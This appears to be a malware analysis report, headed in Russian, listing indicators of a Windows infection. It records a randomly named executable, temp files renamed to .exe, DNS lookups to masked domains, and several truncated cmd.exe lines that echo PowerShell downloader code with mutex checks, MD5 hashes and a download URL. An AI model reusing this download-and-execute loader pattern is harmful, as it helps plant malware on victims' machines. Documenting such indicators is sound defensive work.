Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\fnudgwyvnic.exe' -
- %TEMP%\m6.bin.ori
- %TEMP%\m6.bin.exe
- 'localhost':43669
- DNS ASK d.##r3p.com
- DNS ASK t.##r9g.com
- '<SYSTEM32>\cmd.exe' /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.#####...
- '<SYSTEM32>\cmd.exe' /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.##...
- '<SYSTEM32>\cmd.exe' /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.#####...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http...
- '<SYSTEM32>\cmd.exe' /c copy /y %TEMP%\m6.bin.ori %TEMP%\m6.bin.exe